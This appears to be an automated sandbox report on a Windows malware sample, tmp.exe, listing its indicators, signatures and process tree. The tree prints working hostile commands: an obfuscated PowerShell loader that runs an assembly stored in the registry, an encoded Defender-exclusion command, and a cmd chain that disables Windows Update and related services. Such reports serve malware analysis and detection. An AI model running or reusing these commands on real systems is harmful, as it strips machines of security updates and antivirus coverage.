Analysis
-
max time kernel
151s -
max time network
52s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
-
submitted
17-01-2023 20:24
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20221111-en
General
-
Target
tmp.exe
-
Size
4.9MB
-
MD5
619c8566b61a49d28d25590a16611849
-
SHA1
d6c75e985d9ae6ff79b29bf39cac1d7514e7a473
-
SHA256
aa0a1f379ba188db1bec2c91b483e9b628ddc319da17876cc0bab9d75b756cd2
-
SHA512
a367b2188076923c050879685196dcbbe036dd317e0c976a45999008938fe15621ed69691e9817965df0957abe1a00017ddbe6fa0b0d83a6c5b66ca08de63363
-
SSDEEP
98304:ZlsCMnpZW6zAEqWn4mb8AarnNGEsOOFUySajl69XE:bsdnm68Ev44/2nk8OF1xjl69
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
  description | ioc | process
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | reg.exe
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
  description | pid | process | target process
  PID 2000 created 416 | 2000 | powershell.EXE | winlogon.exe
-
Drops file in Drivers directory 2 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | tmp.exe
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | MicrosoftEdgeUpdate.exe
-
Executes dropped EXE 1 IoCs
Processes:
  pid | process
  1176 | MicrosoftEdgeUpdate.exe
-
Possible privilege escalation attempt 4 IoCs
Processes:
  pid | process
  1776 | takeown.exe
  956 | icacls.exe
  1008 | takeown.exe
  1748 | icacls.exe
-
Stops running service(s) 3 TTPs
-
Processes:
  resource | yara_rule
  behavioral1/memory/1352-54-0x0000000001030000-0x00000000019B4000-memory.dmp | vmprotect
  \Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe | vmprotect
  C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe | vmprotect
  C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe | vmprotect
  behavioral1/memory/1176-129-0x0000000000340000-0x0000000000CC4000-memory.dmp | vmprotect
-
Deletes itself 1 IoCs
Processes:
  pid | process
  1680 | cmd.exe
-
Loads dropped DLL 1 IoCs
Processes:
  pid | process
  1532 | taskeng.exe
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
  pid | process
  1008 | takeown.exe
  1748 | icacls.exe
  1776 | takeown.exe
  956 | icacls.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  4 | ip-api.com
-
Drops file in System32 directory 3 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
  description | pid | process | target process
  PID 1352 set thread context of 572 | 1352 | tmp.exe | conhost.exe
  PID 2000 set thread context of 1076 | 2000 | powershell.EXE | dllhost.exe
-
Drops file in Program Files directory 3 IoCs
Processes:
  description | ioc | process
  File created | C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe | tmp.exe
  File opened for modification | C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe | tmp.exe
  File created | C:\Program Files\Google\Libs\WR64.sys | MicrosoftEdgeUpdate.exe
-
Drops file in Windows directory 6 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\Tasks\dialersvc32.job | conhost.exe
  File opened for modification | C:\Windows\Tasks\dialersvc32.job | conhost.exe
  File created | C:\Windows\Tasks\dialersvc64.job | conhost.exe
  File opened for modification | C:\Windows\Tasks\dialersvc64.job | conhost.exe
  File opened for modification | C:\Windows\appcompat\programs\RecentFileCache.bcf | svchost.exe
  File opened for modification | C:\Windows\Tasks\dialersvc32.job | svchost.exe
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid | process
  856 | sc.exe
  832 | sc.exe
  852 | sc.exe
  624 | sc.exe
  744 | sc.exe
  108 | sc.exe
  1444 | sc.exe
  2016 | sc.exe
  316 | sc.exe
  736 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 5 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.EXE
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30d6a642ba2ad901 | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | MicrosoftEdgeUpdate.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | MicrosoftEdgeUpdate.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | MicrosoftEdgeUpdate.exe
-
Modifies registry key 1 TTPs 17 IoCs
Processes:
  pid | process
  1680 | reg.exe
  1712 | reg.exe
  1516 | reg.exe
  1544 | reg.exe
  2016 | reg.exe
  900 | reg.exe
  316 | reg.exe
  1496 | reg.exe
  1608 | reg.exe
  2000 | reg.exe
  2000 | reg.exe
  1676 | reg.exe
  580 | reg.exe
  1184 | reg.exe
  1412 | reg.exe
  1984 | reg.exe
  1360 | reg.exe
-
Modifies system certificate store
Processes:
  description | ioc | process
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = [certificate blob value not present in the extracted page] | tmp.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | tmp.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid | process
  1244 | powershell.exe
  1352 | tmp.exe
  2000 | powershell.EXE
  2000 | powershell.EXE
  1076 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  1224 | powershell.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  852 | dllhost.exe
  852 | dllhost.exe
  1076 | dllhost.exe
  1076 | dllhost.exe
  852 | dllhost.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1284 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 1244 | powershell.exe
  Token: SeShutdownPrivilege | 920 | powercfg.exe
  Token: SeShutdownPrivilege | 1644 | powercfg.exe
  Token: SeShutdownPrivilege | 1640 | powercfg.exe
  Token: SeShutdownPrivilege | 2004 | powercfg.exe
  Token: SeDebugPrivilege | 1352 | tmp.exe
  Token: SeTakeOwnershipPrivilege | 1008 | takeown.exe
  Token: SeDebugPrivilege | 2000 | powershell.EXE
  Token: SeDebugPrivilege | 2000 | powershell.EXE
  Token: SeDebugPrivilege | 1076 | dllhost.exe
  Token: SeDebugPrivilege | 852 | dllhost.exe
  Token: SeAuditPrivilege | 868 | svchost.exe
  Token: SeDebugPrivilege | 1224 | powershell.exe
  Token: SeShutdownPrivilege | 544 | powercfg.exe
  Token: SeDebugPrivilege | 1176 | MicrosoftEdgeUpdate.exe
  Token: SeShutdownPrivilege | 944 | powercfg.exe
  Token: SeAssignPrimaryTokenPrivilege | 868 | svchost.exe
  Token: SeIncreaseQuotaPrivilege | 868 | svchost.exe
  Token: SeSecurityPrivilege | 868 | svchost.exe
  Token: SeTakeOwnershipPrivilege | 868 | svchost.exe
  Token: SeLoadDriverPrivilege | 868 | svchost.exe
  Token: SeSystemtimePrivilege | 868 | svchost.exe
  Token: SeBackupPrivilege | 868 | svchost.exe
  Token: SeRestorePrivilege | 868 | svchost.exe
  Token: SeShutdownPrivilege | 868 | svchost.exe
  Token: SeSystemEnvironmentPrivilege | 868 | svchost.exe
  Token: SeUndockPrivilege | 868 | svchost.exe
  Token: SeManageVolumePrivilege | 868 | svchost.exe
  Token: SeAssignPrimaryTokenPrivilege | 868 | svchost.exe
  Token: SeIncreaseQuotaPrivilege | 868 | svchost.exe
  Token: SeSecurityPrivilege | 868 | svchost.exe
  Token: SeTakeOwnershipPrivilege | 868 | svchost.exe
  Token: SeLoadDriverPrivilege | 868 | svchost.exe
  Token: SeSystemtimePrivilege | 868 | svchost.exe
  Token: SeBackupPrivilege | 868 | svchost.exe
  Token: SeRestorePrivilege | 868 | svchost.exe
  Token: SeShutdownPrivilege | 868 | svchost.exe
  Token: SeSystemEnvironmentPrivilege | 868 | svchost.exe
  Token: SeUndockPrivilege | 868 | svchost.exe
  Token: SeManageVolumePrivilege | 868 | svchost.exe
  Token: SeAssignPrimaryTokenPrivilege | 868 | svchost.exe
  Token: SeIncreaseQuotaPrivilege | 868 | svchost.exe
  Token: SeSecurityPrivilege | 868 | svchost.exe
  Token: SeTakeOwnershipPrivilege | 868 | svchost.exe
  Token: SeLoadDriverPrivilege | 868 | svchost.exe
  Token: SeSystemtimePrivilege | 868 | svchost.exe
  Token: SeBackupPrivilege | 868 | svchost.exe
  Token: SeRestorePrivilege | 868 | svchost.exe
  Token: SeShutdownPrivilege | 868 | svchost.exe
  Token: SeSystemEnvironmentPrivilege | 868 | svchost.exe
  Token: SeUndockPrivilege | 868 | svchost.exe
  Token: SeManageVolumePrivilege | 868 | svchost.exe
  Token: SeAssignPrimaryTokenPrivilege | 868 | svchost.exe
  Token: SeIncreaseQuotaPrivilege | 868 | svchost.exe
  Token: SeSecurityPrivilege | 868 | svchost.exe
  Token: SeTakeOwnershipPrivilege | 868 | svchost.exe
  Token: SeLoadDriverPrivilege | 868 | svchost.exe
  Token: SeSystemtimePrivilege | 868 | svchost.exe
  Token: SeBackupPrivilege | 868 | svchost.exe
  Token: SeRestorePrivilege | 868 | svchost.exe
  Token: SeShutdownPrivilege | 868 | svchost.exe
  Token: SeSystemEnvironmentPrivilege | 868 | svchost.exe
  Token: SeUndockPrivilege | 868 | svchost.exe
  Token: SeManageVolumePrivilege | 868 | svchost.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description | pid | process | target process
  PID 1352 wrote to memory of 1244 | 1352 | tmp.exe | powershell.exe
  PID 1352 wrote to memory of 1244 | 1352 | tmp.exe | powershell.exe
  PID 1352 wrote to memory of 1244 | 1352 | tmp.exe | powershell.exe
  PID 1352 wrote to memory of 1492 | 1352 | tmp.exe | cmd.exe
  PID 1352 wrote to memory of 1492 | 1352 | tmp.exe | cmd.exe
  PID 1352 wrote to memory of 1492 | 1352 | tmp.exe | cmd.exe
  PID 1352 wrote to memory of 1020 | 1352 | tmp.exe | cmd.exe
  PID 1352 wrote to memory of 1020 | 1352 | tmp.exe | cmd.exe
  PID 1352 wrote to memory of 1020 | 1352 | tmp.exe | cmd.exe
  PID 1492 wrote to memory of 856 | 1492 | cmd.exe | sc.exe
  PID 1492 wrote to memory of 856 | 1492 | cmd.exe | sc.exe
  PID 1492 wrote to memory of 856 | 1492 | cmd.exe | sc.exe
  PID 1020 wrote to memory of 920 | 1020 | cmd.exe | powercfg.exe
  PID 1020 wrote to memory of 920 | 1020 | cmd.exe | powercfg.exe
  PID 1020 wrote to memory of 920 | 1020 | cmd.exe | powercfg.exe
  PID 1492 wrote to memory of 832 | 1492 | cmd.exe | sc.exe
  PID 1492 wrote to memory of 832 | 1492 | cmd.exe | sc.exe
  PID 1492 wrote to memory of 832 | 1492 | cmd.exe | sc.exe
  PID 1020 wrote to memory of 1644 | 1020 | cmd.exe | powercfg.exe
  PID 1020 wrote to memory of 1644 | 1020 | cmd.exe | powercfg.exe
  PID 1020 wrote to memory of 1644 | 1020 | cmd.exe | powercfg.exe
  PID 1492 wrote to memory of 1444 | 1492 | cmd.exe | sc.exe
  PID 1492 wrote to memory of 1444 | 1492 | cmd.exe | sc.exe
  PID 1492 wrote to memory of 1444 | 1492 | cmd.exe | sc.exe
  PID 1492 wrote to memory of 852 | 1492 | cmd.exe | sc.exe
  PID 1492 wrote to memory of 852 | 1492 | cmd.exe | sc.exe
  PID 1492 wrote to memory of 852 | 1492 | cmd.exe | sc.exe
  PID 1020 wrote to memory of 1640 | 1020 | cmd.exe | powercfg.exe
  PID 1020 wrote to memory of 1640 | 1020 | cmd.exe | powercfg.exe
  PID 1020 wrote to memory of 1640 | 1020 | cmd.exe | powercfg.exe
  PID 1492 wrote to memory of 624 | 1492 | cmd.exe | sc.exe
  PID 1492 wrote to memory of 624 | 1492 | cmd.exe | sc.exe
  PID 1492 wrote to memory of 624 | 1492 | cmd.exe | sc.exe
  PID 1492 wrote to memory of 1184 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1184 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1184 | 1492 | cmd.exe | reg.exe
  PID 1020 wrote to memory of 2004 | 1020 | cmd.exe | powercfg.exe
  PID 1020 wrote to memory of 2004 | 1020 | cmd.exe | powercfg.exe
  PID 1020 wrote to memory of 2004 | 1020 | cmd.exe | powercfg.exe
  PID 1492 wrote to memory of 1680 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1680 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1680 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1712 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1712 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1712 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1412 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1412 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1412 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1984 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1984 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1984 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1008 | 1492 | cmd.exe | takeown.exe
  PID 1492 wrote to memory of 1008 | 1492 | cmd.exe | takeown.exe
  PID 1492 wrote to memory of 1008 | 1492 | cmd.exe | takeown.exe
  PID 1492 wrote to memory of 1748 | 1492 | cmd.exe | icacls.exe
  PID 1492 wrote to memory of 1748 | 1492 | cmd.exe | icacls.exe
  PID 1492 wrote to memory of 1748 | 1492 | cmd.exe | icacls.exe
  PID 1492 wrote to memory of 1608 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1608 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1608 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1516 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1516 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1516 | 1492 | cmd.exe | reg.exe
  PID 1492 wrote to memory of 1544 | 1492 | cmd.exe | reg.exe
Processes
- [depth 1] C:\Windows\system32\lsass.exe
  cmdline: C:\Windows\system32\lsass.exe
- [depth 1] C:\Windows\system32\services.exe
  cmdline: C:\Windows\system32\services.exe
- [depth 2] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
- [depth 3] C:\Windows\system32\Dwm.exe
  cmdline: "C:\Windows\system32\Dwm.exe"
- [depth 2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
- [depth 2] C:\Windows\system32\sppsvc.exe
  cmdline: C:\Windows\system32\sppsvc.exe
- [depth 2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
- [depth 2] C:\Windows\system32\taskhost.exe
  cmdline: "taskhost.exe"
- [depth 2] C:\Windows\System32\spoolsv.exe
  cmdline: C:\Windows\System32\spoolsv.exe
- [depth 2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k NetworkService
- [depth 2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\taskeng.exe
  cmdline: taskeng.exe {2D4C2EB5-73A1-4D2D-B9BA-1ACD2C11BC28} S-1-5-18:NT AUTHORITY\System:Service:
  - Loads dropped DLL
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [depth 4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
- [depth 4] C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe
  cmdline: "C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe"
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
- [depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcAB3AHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHQAbQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBvAHYAYwBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdgBsAHUAIwA+AA=="
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [depth 5] C:\Windows\System32\cmd.exe
  cmdline: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
- [depth 6] C:\Windows\system32\sc.exe
  cmdline: sc stop UsoSvc
  - Launches sc.exe
- [depth 6] C:\Windows\system32\sc.exe
  cmdline: sc stop WaaSMedicSvc
  - Launches sc.exe
- [depth 6] C:\Windows\system32\sc.exe
  cmdline: sc stop wuauserv
  - Launches sc.exe
- [depth 6] C:\Windows\system32\sc.exe
  cmdline: sc stop bits
  - Launches sc.exe
- [depth 6] C:\Windows\system32\sc.exe
  cmdline: sc stop dosvc
  - Launches sc.exe
- [depth 6] C:\Windows\system32\reg.exe
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
  - Modifies registry key
- [depth 6] C:\Windows\system32\reg.exe
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
  - Modifies registry key
- [depth 6] C:\Windows\system32\reg.exe
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
  - Modifies registry key
- [depth 6] C:\Windows\system32\reg.exe
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
  - Modifies registry key
- [depth 6] C:\Windows\system32\reg.exe
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
  - Modifies registry key
- [depth 6] C:\Windows\system32\takeown.exe
  cmdline: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
  - Possible privilege escalation attempt
  - Modifies file permissions
- [depth 6] C:\Windows\system32\icacls.exe
  cmdline: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
  - Possible privilege escalation attempt
  - Modifies file permissions
- [depth 6] C:\Windows\system32\reg.exe
  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
  - Modifies registry key
- [depth 6] C:\Windows\system32\reg.exe
  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
  - Modifies registry key
- [depth 6] C:\Windows\system32\reg.exe
  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
  - Modifies registry key
- [depth 5] C:\Windows\System32\cmd.exe
  cmdline: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
- [depth 6] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -hibernate-timeout-ac 0
  - Suspicious use of AdjustPrivilegeToken
- [depth 6] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -hibernate-timeout-dc 0
- [depth 6] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -standby-timeout-ac 0
  - Suspicious use of AdjustPrivilegeToken
- [depth 6] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -standby-timeout-dc 0
- [depth 5] C:\Windows\System32\dialer.exe
  cmdline: C:\Windows\System32\dialer.exe "gnkvzaivrlft"
- [depth 2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalService
- [depth 2] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
- [depth 2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k RPCSS
- [depth 2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch
- [depth 1] C:\Windows\system32\winlogon.exe
  cmdline: winlogon.exe
- [depth 2] C:\Windows\System32\dllhost.exe
  cmdline: C:\Windows\System32\dllhost.exe /Processid:{842ca563-61ab-497b-9870-19d81160ce08}
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [depth 2] C:\Windows\SysWOW64\dllhost.exe
  cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{832cfe56-f95e-4812-b0ca-c99bad1e1a7e}
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [depth 1] \\?\C:\Windows\system32\wbem\WMIADAP.EXE
  cmdline: wmiadap.exe /F /T /R
- [depth 1] C:\Windows\Explorer.EXE
  cmdline: C:\Windows\Explorer.EXE
  - Suspicious behavior: GetForegroundWindowSpam
- [depth 2] C:\Users\Admin\AppData\Local\Temp\tmp.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
  - Drops file in Drivers directory
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
